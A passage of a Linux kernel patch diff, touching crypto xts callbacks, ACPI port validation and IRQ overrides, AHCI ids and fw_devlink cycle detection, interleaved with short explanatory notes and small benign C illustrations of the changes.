+ 		struct xts_request_ctx *rctx = skcipher_request_ctx(req);
+ 
+-		rctx->subreq.base.flags &= ~CRYPTO_TFM_REQ_MAY_SLEEP;
++		rctx->subreq.base.flags &= CRYPTO_TFM_REQ_MAY_BACKLOG;
+ 		err = xts_xor_tweak_post(req, true);
+ 
+ 		if (!err && unlikely(req->cryptlen % XTS_BLOCK_SIZE)) {
+ 			err = xts_cts_final(req, crypto_skcipher_encrypt);
+-			if (err == -EINPROGRESS)
++			if (err == -EINPROGRESS || err == -EBUSY)
+ 				return;
+ 		}
+ 	}
+@@ -223,12 +223,12 @@ static void xts_decrypt_done(struct crypto_async_request *areq, int err)
+ 	if (!err) {
+ 		struct xts_request_ctx *rctx = skcipher_request_ctx(req);
+ 
+-		rctx->subreq.base.flags &= ~CRYPTO_TFM_REQ_MAY_SLEEP;
++		rctx->subreq.base.flags &= CRYPTO_TFM_REQ_MAY_BACKLOG;
+ 		err = xts_xor_tweak_post(req, false);
+ 
+ 		if (!err && unlikely(req->cryptlen % XTS_BLOCK_SIZE)) {
+ 			err = xts_cts_final(req, crypto_skcipher_decrypt);
+-			if (err == -EINPROGRESS)
++			if (err == -EINPROGRESS || err == -EBUSY)
+ 				return;
+ 		}
+ 	}
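The essiv, seqiv and xts hunks (and the pkcs1pad ones above) all encode
the same rule: -EINPROGRESS and -EBUSY delivered to a completion callback
are notifications that the request is still in flight, so per-request
state must not be freed yet. A toy model of the callback discipline
(nothing below is crypto API):

#include <errno.h>
#include <stdio.h>
#include <stdlib.h>

struct req { void *assoc; };

static void complete_cb(struct req *r, int err)
{
	if (err == -EINPROGRESS || err == -EBUSY)
		return;		/* still in flight: keep r->assoc alive */

	free(r->assoc);		/* final completion: safe to clean up */
	r->assoc = NULL;
	printf("completed with %d\n", err);
}

int main(void)
{
	struct req r = { malloc(16) };

	complete_cb(&r, -EBUSY);	/* backlogged: no free */
	complete_cb(&r, 0);		/* real completion */
	return 0;
}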
+diff --git a/drivers/accel/Kconfig b/drivers/accel/Kconfig
+index c9ce849b2984a..c8177ae415b8b 100644
+--- a/drivers/accel/Kconfig
++++ b/drivers/accel/Kconfig
+@@ -6,9 +6,10 @@
+ # as, but not limited to, Machine-Learning and Deep-Learning acceleration
+ # devices
+ #
++if DRM
++
+ menuconfig DRM_ACCEL
+ 	bool "Compute Acceleration Framework"
+-	depends on DRM
+ 	help
+ 	  Framework for device drivers of compute acceleration devices, such
+ 	  as, but not limited to, Machine-Learning and Deep-Learning
+@@ -22,3 +23,5 @@ menuconfig DRM_ACCEL
+ 	  major number than GPUs, and will be exposed to user-space using
+ 	  different device files, called accel/accel* (in /dev, sysfs
+ 	  and debugfs).
++
++endif
+diff --git a/drivers/acpi/acpica/Makefile b/drivers/acpi/acpica/Makefile
+index 9e0d95d76fff7..30f3fc13c29d1 100644
+--- a/drivers/acpi/acpica/Makefile
++++ b/drivers/acpi/acpica/Makefile
+@@ -3,7 +3,7 @@
+ # Makefile for ACPICA Core interpreter
+ #
+ 
+-ccflags-y			:= -Os -D_LINUX -DBUILDING_ACPICA
++ccflags-y			:= -D_LINUX -DBUILDING_ACPICA
+ ccflags-$(CONFIG_ACPI_DEBUG)	+= -DACPI_DEBUG_OUTPUT
+ 
+ # use acpi.o to put all files here into acpi.o modparam namespace
+diff --git a/drivers/acpi/acpica/hwvalid.c b/drivers/acpi/acpica/hwvalid.c
+index 915b26448d2c9..0d392e7b0747b 100644
+--- a/drivers/acpi/acpica/hwvalid.c
++++ b/drivers/acpi/acpica/hwvalid.c
+@@ -23,8 +23,8 @@ acpi_hw_validate_io_request(acpi_io_address address, u32 bit_width);
+  *
+  * The table is used to implement the Microsoft port access rules that
+  * first appeared in Windows XP. Some ports are always illegal, and some
+- * ports are only illegal if the BIOS calls _OSI with a win_XP string or
+- * later (meaning that the BIOS itself is post-XP.)
++ * ports are only illegal if the BIOS calls _OSI with nothing newer than
++ * the specific _OSI strings.
+  *
+  * This provides ACPICA with the desired port protections and
+  * Microsoft compatibility.
+@@ -145,7 +145,8 @@ acpi_hw_validate_io_request(acpi_io_address address, u32 bit_width)
+ 
+ 			/* Port illegality may depend on the _OSI calls made by the BIOS */
+ 
+-			if (acpi_gbl_osi_data >= port_info->osi_dependency) {
++			if (port_info->osi_dependency == ACPI_ALWAYS_ILLEGAL ||
++			    acpi_gbl_osi_data == port_info->osi_dependency) {
+ 				ACPI_DEBUG_PRINT((ACPI_DB_VALUES,
+ 						  "Denied AML access to port 0x%8.8X%8.8X/%X (%s 0x%.4X-0x%.4X)\n",
+ 						  ACPI_FORMAT_UINT64(address),
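The predicate change above narrows the Microsoft port-protection rule: a
port is now denied either unconditionally or when the BIOS's _OSI level
matches the table entry exactly, instead of for every newer level too. A
toy version of the new test (entry values invented for the sketch):

#include <stdio.h>

#define ACPI_ALWAYS_ILLEGAL 0x00

struct port_rule { unsigned int osi_dependency; };

static int denied(const struct port_rule *r, unsigned int osi_data)
{
	return r->osi_dependency == ACPI_ALWAYS_ILLEGAL ||
	       r->osi_dependency == osi_data;
}

int main(void)
{
	struct port_rule always = { ACPI_ALWAYS_ILLEGAL };
	struct port_rule xp_only = { 3 };	/* toy _OSI level */

	printf("%d %d %d\n",
	       denied(&always, 5),	/* 1: always illegal */
	       denied(&xp_only, 3),	/* 1: exact match */
	       denied(&xp_only, 5));	/* 0: newer level, now allowed */
	return 0;
}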
+diff --git a/drivers/acpi/acpica/nsrepair.c b/drivers/acpi/acpica/nsrepair.c
+index 367fcd201f96e..ec512e06a48ed 100644
+--- a/drivers/acpi/acpica/nsrepair.c
++++ b/drivers/acpi/acpica/nsrepair.c
+@@ -181,8 +181,9 @@ acpi_ns_simple_repair(struct acpi_evaluate_info *info,
+ 	 * Try to fix if there was no return object. Warning if failed to fix.
+ 	 */
+ 	if (!return_object) {
+-		if (expected_btypes && (!(expected_btypes & ACPI_RTYPE_NONE))) {
+-			if (package_index != ACPI_NOT_PACKAGE_ELEMENT) {
++		if (expected_btypes) {
++			if (!(expected_btypes & ACPI_RTYPE_NONE) &&
++			    package_index != ACPI_NOT_PACKAGE_ELEMENT) {
+ 				ACPI_WARN_PREDEFINED((AE_INFO,
+ 						      info->full_pathname,
+ 						      ACPI_WARN_ALWAYS,
+@@ -196,14 +197,15 @@ acpi_ns_simple_repair(struct acpi_evaluate_info *info,
+ 				if (ACPI_SUCCESS(status)) {
+ 					return (AE_OK);	/* Repair was successful */
+ 				}
+-			} else {
++			}
++
++			if (expected_btypes != ACPI_RTYPE_NONE) {
+ 				ACPI_WARN_PREDEFINED((AE_INFO,
+ 						      info->full_pathname,
+ 						      ACPI_WARN_ALWAYS,
+ 						      "Missing expected return value"));
++				return (AE_AML_NO_RETURN_VALUE);
+ 			}
+-
+-			return (AE_AML_NO_RETURN_VALUE);
+ 		}
+ 	}
+ 
+diff --git a/drivers/acpi/battery.c b/drivers/acpi/battery.c
+index f4badcdde76e6..fb64bd217d826 100644
+--- a/drivers/acpi/battery.c
++++ b/drivers/acpi/battery.c
+@@ -440,7 +440,7 @@ static int extract_package(struct acpi_battery *battery,
+ 
+ 			if (element->type == ACPI_TYPE_STRING ||
+ 			    element->type == ACPI_TYPE_BUFFER)
+-				strncpy(ptr, element->string.pointer, 32);
++				strscpy(ptr, element->string.pointer, 32);
+ 			else if (element->type == ACPI_TYPE_INTEGER) {
+ 				strncpy(ptr, (u8 *)&element->integer.value,
+ 					sizeof(u64));
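The strncpy-to-strscpy switch above matters because strncpy() leaves the
destination unterminated whenever the source fills the buffer, while
strscpy() always terminates and reports truncation. A userspace sketch
with a minimal stand-in for the kernel helper:

#include <stdio.h>
#include <string.h>

static long my_strscpy(char *dst, const char *src, size_t size)
{
	size_t len = strnlen(src, size);

	if (!size)
		return -1;
	if (len >= size) {		/* would not fit: truncate */
		memcpy(dst, src, size - 1);
		dst[size - 1] = '\0';
		return -1;		/* kernel returns -E2BIG here */
	}
	memcpy(dst, src, len + 1);
	return (long)len;
}

int main(void)
{
	char a[8], b[8];

	strncpy(a, "0123456789", sizeof(a));	/* a has no terminator */
	my_strscpy(b, "0123456789", sizeof(b));	/* b is "0123456" + NUL */

	printf("strscpy result: %s\n", b);
	return 0;
}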
+diff --git a/drivers/acpi/resource.c b/drivers/acpi/resource.c
+index 192d1784e409b..a222bda7e15b0 100644
+--- a/drivers/acpi/resource.c
++++ b/drivers/acpi/resource.c
+@@ -467,17 +467,34 @@ static const struct dmi_system_id lenovo_laptop[] = {
+ 	{ }
+ };
+ 
+-static const struct dmi_system_id schenker_gm_rg[] = {
++static const struct dmi_system_id tongfang_gm_rg[] = {
+ 	{
+-		.ident = "XMG CORE 15 (M22)",
++		.ident = "TongFang GMxRGxx/XMG CORE 15 (M22)/TUXEDO Stellaris 15 Gen4 AMD",
+ 		.matches = {
+-			DMI_MATCH(DMI_SYS_VENDOR, "SchenkerTechnologiesGmbH"),
+ 			DMI_MATCH(DMI_BOARD_NAME, "GMxRGxx"),
+ 		},
+ 	},
+ 	{ }
+ };
+ 
++static const struct dmi_system_id maingear_laptop[] = {
++	{
++		.ident = "MAINGEAR Vector Pro 2 15",
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "Micro Electronics Inc"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "MG-VCP2-15A3070T"),
++		}
++	},
++	{
++		.ident = "MAINGEAR Vector Pro 2 17",
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "Micro Electronics Inc"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "MG-VCP2-17A3070T"),
++		},
++	},
++	{ }
++};
++
+ struct irq_override_cmp {
+ 	const struct dmi_system_id *system;
+ 	unsigned char irq;
+@@ -492,7 +509,8 @@ static const struct irq_override_cmp override_table[] = {
+ 	{ asus_laptop, 1, ACPI_LEVEL_SENSITIVE, ACPI_ACTIVE_LOW, 0, false },
+ 	{ lenovo_laptop, 6, ACPI_LEVEL_SENSITIVE, ACPI_ACTIVE_LOW, 0, true },
+ 	{ lenovo_laptop, 10, ACPI_LEVEL_SENSITIVE, ACPI_ACTIVE_LOW, 0, true },
+-	{ schenker_gm_rg, 1, ACPI_EDGE_SENSITIVE, ACPI_ACTIVE_LOW, 1, true },
++	{ tongfang_gm_rg, 1, ACPI_EDGE_SENSITIVE, ACPI_ACTIVE_LOW, 1, true },
++	{ maingear_laptop, 1, ACPI_EDGE_SENSITIVE, ACPI_ACTIVE_LOW, 1, true },
+ };
+ 
+ static bool acpi_dev_irq_override(u32 gsi, u8 triggering, u8 polarity,
+diff --git a/drivers/acpi/video_detect.c b/drivers/acpi/video_detect.c
+index a8c02608dde45..710ac640267dd 100644
+--- a/drivers/acpi/video_detect.c
++++ b/drivers/acpi/video_detect.c
+@@ -434,7 +434,7 @@ static const struct dmi_system_id video_detect_dmi_table[] = {
+ 	 /* Lenovo Ideapad Z570 */
+ 	 .matches = {
+ 		DMI_MATCH(DMI_SYS_VENDOR, "LENOVO"),
+-		DMI_MATCH(DMI_PRODUCT_NAME, "102434U"),
++		DMI_MATCH(DMI_PRODUCT_VERSION, "Ideapad Z570"),
+ 		},
+ 	},
+ 	{
+diff --git a/drivers/ata/ahci.c b/drivers/ata/ahci.c
+index 3bb9bb483fe37..14a1c0d14916f 100644
+--- a/drivers/ata/ahci.c
++++ b/drivers/ata/ahci.c
+@@ -421,7 +421,6 @@ static const struct pci_device_id ahci_pci_tbl[] = {
+ 	{ PCI_VDEVICE(INTEL, 0x34d3), board_ahci_low_power }, /* Ice Lake LP AHCI */
+ 	{ PCI_VDEVICE(INTEL, 0x02d3), board_ahci_low_power }, /* Comet Lake PCH-U AHCI */
+ 	{ PCI_VDEVICE(INTEL, 0x02d7), board_ahci_low_power }, /* Comet Lake PCH RAID */
+-	{ PCI_VDEVICE(INTEL, 0xa0d3), board_ahci_low_power }, /* Tiger Lake UP{3,4} AHCI */
+ 
+ 	/* JMicron 360/1/3/5/6, match class to avoid IDE function */
+ 	{ PCI_VENDOR_ID_JMICRON, PCI_ANY_ID, PCI_ANY_ID, PCI_ANY_ID,
+diff --git a/drivers/base/core.c b/drivers/base/core.c
+index a3e14143ec0cf..6ed21587be287 100644
+--- a/drivers/base/core.c
++++ b/drivers/base/core.c
+@@ -54,11 +54,12 @@ static LIST_HEAD(deferred_sync);
+ static unsigned int defer_sync_state_count = 1;
+ static DEFINE_MUTEX(fwnode_link_lock);
+ static bool fw_devlink_is_permissive(void);
++static void __fw_devlink_link_to_consumers(struct device *dev);
+ static bool fw_devlink_drv_reg_done;
+ static bool fw_devlink_best_effort;
+ 
+ /**
+- * fwnode_link_add - Create a link between two fwnode_handles.
++ * __fwnode_link_add - Create a link between two fwnode_handles.
+  * @con: Consumer end of the link.
+  * @sup: Supplier end of the link.
+  *
+@@ -74,35 +75,42 @@ static bool fw_devlink_best_effort;
+  * Attempts to create duplicate links between the same pair of fwnode handles
+  * are ignored and there is no reference counting.
+  */
+-int fwnode_link_add(struct fwnode_handle *con, struct fwnode_handle *sup)
++static int __fwnode_link_add(struct fwnode_handle *con,
++			     struct fwnode_handle *sup, u8 flags)
+ {
+ 	struct fwnode_link *link;
+-	int ret = 0;
+-
+-	mutex_lock(&fwnode_link_lock);
+ 
+ 	list_for_each_entry(link, &sup->consumers, s_hook)
+-		if (link->consumer == con)
+-			goto out;
++		if (link->consumer == con) {
++			link->flags |= flags;
++			return 0;
++		}
+ 
+ 	link = kzalloc(sizeof(*link), GFP_KERNEL);
+-	if (!link) {
+-		ret = -ENOMEM;
+-		goto out;
+-	}
++	if (!link)
++		return -ENOMEM;
+ 
+ 	link->supplier = sup;
+ 	INIT_LIST_HEAD(&link->s_hook);
+ 	link->consumer = con;
+ 	INIT_LIST_HEAD(&link->c_hook);
++	link->flags = flags;
+ 
+ 	list_add(&link->s_hook, &sup->consumers);
+ 	list_add(&link->c_hook, &con->suppliers);
+ 	pr_debug("%pfwP Linked as a fwnode consumer to %pfwP\n",
+ 		 con, sup);
+-out:
+-	mutex_unlock(&fwnode_link_lock);
+ 
++	return 0;
++}
++
++int fwnode_link_add(struct fwnode_handle *con, struct fwnode_handle *sup)
++{
++	int ret;
++
++	mutex_lock(&fwnode_link_lock);
++	ret = __fwnode_link_add(con, sup, 0);
++	mutex_unlock(&fwnode_link_lock);
+ 	return ret;
+ }
+ 
+@@ -121,6 +129,19 @@ static void __fwnode_link_del(struct fwnode_link *link)
+ 	kfree(link);
+ }
+ 
++/**
++ * __fwnode_link_cycle - Mark a fwnode link as being part of a cycle.
++ * @link: the fwnode_link to be marked
++ *
++ * The fwnode_link_lock needs to be held when this function is called.
++ */
++static void __fwnode_link_cycle(struct fwnode_link *link)
++{
++	pr_debug("%pfwf: Relaxing link with %pfwf\n",
++		 link->consumer, link->supplier);
++	link->flags |= FWLINK_FLAG_CYCLE;
++}
++
+ /**
+  * fwnode_links_purge_suppliers - Delete all supplier links of fwnode_handle.
+  * @fwnode: fwnode whose supplier links need to be deleted
+@@ -181,6 +202,51 @@ void fw_devlink_purge_absent_suppliers(struct fwnode_handle *fwnode)
+ }
+ EXPORT_SYMBOL_GPL(fw_devlink_purge_absent_suppliers);
+ 
++/**
++ * __fwnode_links_move_consumers - Move consumers from @from to @to fwnode_handle
++ * @from: move consumers away from this fwnode
++ * @to: move consumers to this fwnode
++ *
++ * Move all consumer links from @from fwnode to @to fwnode.
++ */
++static void __fwnode_links_move_consumers(struct fwnode_handle *from,
++					  struct fwnode_handle *to)
++{
++	struct fwnode_link *link, *tmp;
++
++	list_for_each_entry_safe(link, tmp, &from->consumers, s_hook) {
++		__fwnode_link_add(link->consumer, to, link->flags);
++		__fwnode_link_del(link);
++	}
++}
++
++/**
++ * __fw_devlink_pickup_dangling_consumers - Pick up dangling consumers
++ * @fwnode: fwnode from which to pick up dangling consumers
++ * @new_sup: fwnode of new supplier
++ *
++ * If the @fwnode has a corresponding struct device and the device supports
++ * probing (that is, added to a bus), then we want to let fw_devlink create
++ * MANAGED device links to this device, so leave @fwnode and its descendants'
++ * fwnode links alone.
++ *
++ * Otherwise, move its consumers to the new supplier @new_sup.
++ */
++static void __fw_devlink_pickup_dangling_consumers(struct fwnode_handle *fwnode,
++						   struct fwnode_handle *new_sup)
++{
++	struct fwnode_handle *child;
++
++	if (fwnode->dev && fwnode->dev->bus)
++		return;
++
++	fwnode->flags |= FWNODE_FLAG_NOT_DEVICE;
++	__fwnode_links_move_consumers(fwnode, new_sup);
++
++	fwnode_for_each_available_child_node(fwnode, child)
++		__fw_devlink_pickup_dangling_consumers(child, new_sup);
++}
++
+ #ifdef CONFIG_SRCU
+ static DEFINE_MUTEX(device_links_lock);
+ DEFINE_STATIC_SRCU(device_links_srcu);
+@@ -272,6 +338,12 @@ static bool device_is_ancestor(struct device *dev, struct device *target)
+ 	return false;
+ }
+ 
++static inline bool device_link_flag_is_sync_state_only(u32 flags)
++{
++	return (flags & ~(DL_FLAG_INFERRED | DL_FLAG_CYCLE)) ==
++		(DL_FLAG_SYNC_STATE_ONLY | DL_FLAG_MANAGED);
++}
++
+ /**
+  * device_is_dependent - Check if one device depends on another one
+  * @dev: Device to check dependencies for.
+@@ -298,8 +370,7 @@ int device_is_dependent(struct device *dev, void *target)
+ 		return ret;
+ 
+ 	list_for_each_entry(link, &dev->links.consumers, s_node) {
+-		if ((link->flags & ~DL_FLAG_INFERRED) ==
+-		    (DL_FLAG_SYNC_STATE_ONLY | DL_FLAG_MANAGED))
++		if (device_link_flag_is_sync_state_only(link->flags))
+ 			continue;
+ 
+ 		if (link->consumer == target)
+@@ -372,8 +443,7 @@ static int device_reorder_to_tail(struct device *dev, void *not_used)
+ 
+ 	device_for_each_child(dev, NULL, device_reorder_to_tail);
+ 	list_for_each_entry(link, &dev->links.consumers, s_node) {
+-		if ((link->flags & ~DL_FLAG_INFERRED) ==
+-		    (DL_FLAG_SYNC_STATE_ONLY | DL_FLAG_MANAGED))
++		if (device_link_flag_is_sync_state_only(link->flags))
+ 			continue;
+ 		device_reorder_to_tail(link->consumer, NULL);
+ 	}
+@@ -634,7 +704,8 @@ postcore_initcall(devlink_class_init);
+ 			       DL_FLAG_AUTOREMOVE_SUPPLIER | \
+ 			       DL_FLAG_AUTOPROBE_CONSUMER  | \
+ 			       DL_FLAG_SYNC_STATE_ONLY | \
+-			       DL_FLAG_INFERRED)
++			       DL_FLAG_INFERRED | \
++			       DL_FLAG_CYCLE)
+ 
+ #define DL_ADD_VALID_FLAGS (DL_MANAGED_LINK_FLAGS | DL_FLAG_STATELESS | \
+ 			    DL_FLAG_PM_RUNTIME | DL_FLAG_RPM_ACTIVE)
+@@ -703,8 +774,6 @@ struct device_link *device_link_add(struct device *consumer,
+ 	if (!consumer || !supplier || consumer == supplier ||
+ 	    flags & ~DL_ADD_VALID_FLAGS ||
+ 	    (flags & DL_FLAG_STATELESS && flags & DL_MANAGED_LINK_FLAGS) ||
+-	    (flags & DL_FLAG_SYNC_STATE_ONLY &&
+-	     (flags & ~DL_FLAG_INFERRED) != DL_FLAG_SYNC_STATE_ONLY) ||
+ 	    (flags & DL_FLAG_AUTOPROBE_CONSUMER &&
+ 	     flags & (DL_FLAG_AUTOREMOVE_CONSUMER |
+ 		      DL_FLAG_AUTOREMOVE_SUPPLIER)))
+@@ -720,6 +789,10 @@ struct device_link *device_link_add(struct device *consumer,
+ 	if (!(flags & DL_FLAG_STATELESS))
+ 		flags |= DL_FLAG_MANAGED;
+ 
++	if (flags & DL_FLAG_SYNC_STATE_ONLY &&
++	    !device_link_flag_is_sync_state_only(flags))
++		return NULL;
++
+ 	device_links_write_lock();
+ 	device_pm_lock();
+ 
+@@ -984,6 +1057,21 @@ static bool dev_is_best_effort(struct device *dev)
+ 		(dev->fwnode && (dev->fwnode->flags & FWNODE_FLAG_BEST_EFFORT));
+ }
+ 
++static struct fwnode_handle *fwnode_links_check_suppliers(
++						struct fwnode_handle *fwnode)
++{
++	struct fwnode_link *link;
++
++	if (!fwnode || fw_devlink_is_permissive())
++		return NULL;
++
++	list_for_each_entry(link, &fwnode->suppliers, c_hook)
++		if (!(link->flags & FWLINK_FLAG_CYCLE))
++			return link->supplier;
++
++	return NULL;
++}
++
+ /**
+  * device_links_check_suppliers - Check presence of supplier drivers.
+  * @dev: Consumer device.
+@@ -1011,11 +1099,8 @@ int device_links_check_suppliers(struct device *dev)
+ 	 * probe.
+ 	 */
+ 	mutex_lock(&fwnode_link_lock);
+-	if (dev->fwnode && !list_empty(&dev->fwnode->suppliers) &&
+-	    !fw_devlink_is_permissive()) {
+-		sup_fw = list_first_entry(&dev->fwnode->suppliers,
+-					  struct fwnode_link,
+-					  c_hook)->supplier;
++	sup_fw = fwnode_links_check_suppliers(dev->fwnode);
++	if (sup_fw) {
+ 		if (!dev_is_best_effort(dev)) {
+ 			fwnode_ret = -EPROBE_DEFER;
+ 			dev_err_probe(dev, -EPROBE_DEFER,
+@@ -1204,7 +1289,9 @@ static ssize_t waiting_for_supplier_show(struct device *dev,
+ 	bool val;
+ 
+ 	device_lock(dev);
+-	val = !list_empty(&dev->fwnode->suppliers);
++	mutex_lock(&fwnode_link_lock);
++	val = !!fwnode_links_check_suppliers(dev->fwnode);
++	mutex_unlock(&fwnode_link_lock);
+ 	device_unlock(dev);
+ 	return sysfs_emit(buf, "%u\n", val);
+ }
+@@ -1267,16 +1354,23 @@ void device_links_driver_bound(struct device *dev)
+ 	 * them. So, fw_devlink no longer needs to create device links to any
+ 	 * of the device's suppliers.
+ 	 *
+-	 * Also, if a child firmware node of this bound device is not added as
+-	 * a device by now, assume it is never going to be added and make sure
+-	 * other devices don't defer probe indefinitely by waiting for such a
+-	 * child device.
++	 * Also, if a child firmware node of this bound device is not added as a
++	 * device by now, assume it is never going to be added. Make this bound
++	 * device the fallback supplier to the dangling consumers of the child
++	 * firmware node because this bound device is probably implementing the
++	 * child firmware node functionality and we don't want the dangling
++	 * consumers to defer probe indefinitely waiting for a device for the
++	 * child firmware node.
+ 	 */
+ 	if (dev->fwnode && dev->fwnode->dev == dev) {
+ 		struct fwnode_handle *child;
+ 		fwnode_links_purge_suppliers(dev->fwnode);
++		mutex_lock(&fwnode_link_lock);
+ 		fwnode_for_each_available_child_node(dev->fwnode, child)
+-			fw_devlink_purge_absent_suppliers(child);
++			__fw_devlink_pickup_dangling_consumers(child,
++							       dev->fwnode);
++		__fw_devlink_link_to_consumers(dev);
++		mutex_unlock(&fwnode_link_lock);
+ 	}
+ 	device_remove_file(dev, &dev_attr_waiting_for_supplier);
+ 
+@@ -1633,8 +1727,11 @@ static int __init fw_devlink_strict_setup(char *arg)
+ }
+ early_param("fw_devlink.strict", fw_devlink_strict_setup);
+ 
+-u32 fw_devlink_get_flags(void)
++static inline u32 fw_devlink_get_flags(u8 fwlink_flags)
+ {
++	if (fwlink_flags & FWLINK_FLAG_CYCLE)
++		return FW_DEVLINK_FLAGS_PERMISSIVE | DL_FLAG_CYCLE;
++
+ 	return fw_devlink_flags;
+ }
+ 
+@@ -1672,7 +1769,7 @@ static void fw_devlink_relax_link(struct device_link *link)
+ 	if (!(link->flags & DL_FLAG_INFERRED))
+ 		return;
+ 
+-	if (link->flags == (DL_FLAG_MANAGED | FW_DEVLINK_FLAGS_PERMISSIVE))
++	if (device_link_flag_is_sync_state_only(link->flags))
+ 		return;
+ 
+ 	pm_runtime_drop_link(link);
+@@ -1769,44 +1866,138 @@ static void fw_devlink_unblock_consumers(struct device *dev)
+ 	device_links_write_unlock();
+ }
+ 
++
++static bool fwnode_init_without_drv(struct fwnode_handle *fwnode)
++{
++	struct device *dev;
++	bool ret;
++
++	if (!(fwnode->flags & FWNODE_FLAG_INITIALIZED))
++		return false;
++
++	dev = get_dev_from_fwnode(fwnode);
++	ret = !dev || dev->links.status == DL_DEV_NO_DRIVER;
++	put_device(dev);
++
++	return ret;
++}
++
++static bool fwnode_ancestor_init_without_drv(struct fwnode_handle *fwnode)
++{
++	struct fwnode_handle *parent;
++
++	fwnode_for_each_parent_node(fwnode, parent) {
++		if (fwnode_init_without_drv(parent)) {
++			fwnode_handle_put(parent);
++			return true;
++		}
++	}
++
++	return false;
++}
++
+ /**
+- * fw_devlink_relax_cycle - Convert cyclic links to SYNC_STATE_ONLY links
+- * @con: Device to check dependencies for.
+- * @sup: Device to check against.
+- *
+- * Check if @sup depends on @con or any device dependent on it (its child or
+- * its consumer etc).  When such a cyclic dependency is found, convert all
+- * device links created solely by fw_devlink into SYNC_STATE_ONLY device links.
+- * This is the equivalent of doing fw_devlink=permissive just between the
+- * devices in the cycle. We need to do this because, at this point, fw_devlink
+- * can't tell which of these dependencies is not a real dependency.
+- *
+- * Return 1 if a cycle is found. Otherwise, return 0.
++ * __fw_devlink_relax_cycles - Relax and mark dependency cycles.
++ * @con: Potential consumer device.
++ * @sup_handle: Potential supplier's fwnode.
++ *
++ * Needs to be called with fwnode_lock and device link lock held.
++ *
++ * Check if @sup_handle or any of its ancestors or suppliers directly or
++ * indirectly depend on @con. This function can detect multiple cycles
++ * between @sup_handle and @con. When such dependency cycles are found,
++ * convert all device links created solely by fw_devlink into
++ * SYNC_STATE_ONLY device links. Also, mark all fwnode links in the cycle
++ * with FWLINK_FLAG_CYCLE so that, when they are converted into device
++ * links in the future, they are created as SYNC_STATE_ONLY device links.
++ * This is the equivalent of doing fw_devlink=permissive just between the
++ * devices in the cycle. We need to do this because, at this point,
++ * fw_devlink can't tell which of these dependencies is not a real dependency.
++ *
++ * Return true if one or more cycles were found. Otherwise, return false.
+  */
+-static int fw_devlink_relax_cycle(struct device *con, void *sup)
++static bool __fw_devlink_relax_cycles(struct device *con,
++				 struct fwnode_handle *sup_handle)
+ {
+-	struct device_link *link;
+-	int ret;
++	struct device *sup_dev = NULL, *par_dev = NULL;
++	struct fwnode_link *link;
++	struct device_link *dev_link;
++	bool ret = false;
+ 
+-	if (con == sup)
+-		return 1;
++	if (!sup_handle)
++		return false;
+ 
+-	ret = device_for_each_child(con, sup, fw_devlink_relax_cycle);
+-	if (ret)
+-		return ret;
++	/*
++	 * We aren't trying to find all cycles. Just a cycle between con and
++	 * sup_handle.
++	 */
++	if (sup_handle->flags & FWNODE_FLAG_VISITED)
++		return false;
+ 
+-	list_for_each_entry(link, &con->links.consumers, s_node) {
+-		if ((link->flags & ~DL_FLAG_INFERRED) ==
+-		    (DL_FLAG_SYNC_STATE_ONLY | DL_FLAG_MANAGED))
+-			continue;
++	sup_handle->flags |= FWNODE_FLAG_VISITED;
+ 
+-		if (!fw_devlink_relax_cycle(link->consumer, sup))
+-			continue;
++	sup_dev = get_dev_from_fwnode(sup_handle);
+ 
+-		ret = 1;
++	/* Termination condition. */
++	if (sup_dev == con) {
++		ret = true;
++		goto out;
++	}
+ 
+-		fw_devlink_relax_link(link);
++	/*
++	 * If sup_dev is bound to a driver and @con hasn't started binding to a
++	 * driver, sup_dev can't be a consumer of @con. So, no need to check
++	 * further.
++	 */
++	if (sup_dev && sup_dev->links.status == DL_DEV_DRIVER_BOUND &&
++	    con->links.status == DL_DEV_NO_DRIVER) {
++		ret = false;
++		goto out;
++	}
++
++	list_for_each_entry(link, &sup_handle->suppliers, c_hook) {
++		if (__fw_devlink_relax_cycles(con, link->supplier)) {
++			__fwnode_link_cycle(link);
++			ret = true;
++		}
++	}
++
++	/*
++	 * Give priority to device parent over fwnode parent to account for any
++	 * quirks in how fwnodes are converted to devices.
++	 */
++	if (sup_dev)
++		par_dev = get_device(sup_dev->parent);
++	else
++		par_dev = fwnode_get_next_parent_dev(sup_handle);
++
++	if (par_dev && __fw_devlink_relax_cycles(con, par_dev->fwnode))
++		ret = true;
++
++	if (!sup_dev)
++		goto out;
++
++	list_for_each_entry(dev_link, &sup_dev->links.suppliers, c_node) {
++		/*
++		 * Ignore a SYNC_STATE_ONLY flag only if it wasn't marked as
++		 * such due to a cycle.
++		 */
++		if (device_link_flag_is_sync_state_only(dev_link->flags) &&
++		    !(dev_link->flags & DL_FLAG_CYCLE))
++			continue;
++
++		if (__fw_devlink_relax_cycles(con,
++					      dev_link->supplier->fwnode)) {
++			fw_devlink_relax_link(dev_link);
++			dev_link->flags |= DL_FLAG_CYCLE;
++			ret = true;
++		}
+ 	}
++
++out:
++	sup_handle->flags &= ~FWNODE_FLAG_VISITED;
++	put_device(sup_dev);
++	put_device(par_dev);
+ 	return ret;
+ }
+ 
+@@ -1814,7 +2005,7 @@ static int fw_devlink_relax_cycle(struct device *con, void *sup)
+  * fw_devlink_create_devlink - Create a device link from a consumer to fwnode
+  * @con: consumer device for the device link
+  * @sup_handle: fwnode handle of supplier
+- * @flags: devlink flags
++ * @link: fwnode link that's being converted to a device link
+  *
+  * This function will try to create a device link between the consumer device
+  * @con and the supplier device represented by @sup_handle.
+@@ -1831,10 +2022,17 @@ static int fw_devlink_relax_cycle(struct device *con, void *sup)
+  *  possible to do that in the future
+  */
+ static int fw_devlink_create_devlink(struct device *con,
+-				     struct fwnode_handle *sup_handle, u32 flags)
++				     struct fwnode_handle *sup_handle,
++				     struct fwnode_link *link)
+ {
+ 	struct device *sup_dev;
+ 	int ret = 0;
++	u32 flags;
++
++	if (con->fwnode == link->consumer)
++		flags = fw_devlink_get_flags(link->flags);
++	else
++		flags = FW_DEVLINK_FLAGS_PERMISSIVE;
+ 
+ 	/*
+ 	 * In some cases, a device P might also be a supplier to its child node
+@@ -1855,7 +2053,26 @@ static int fw_devlink_create_devlink(struct device *con,
+ 	    fwnode_is_ancestor_of(sup_handle, con->fwnode))
+ 		return -EINVAL;
+ 
+-	sup_dev = get_dev_from_fwnode(sup_handle);
++	/*
++	 * SYNC_STATE_ONLY device links don't block probing and support cycles.
++	 * So cycle detection isn't necessary and shouldn't be done.
++	 */
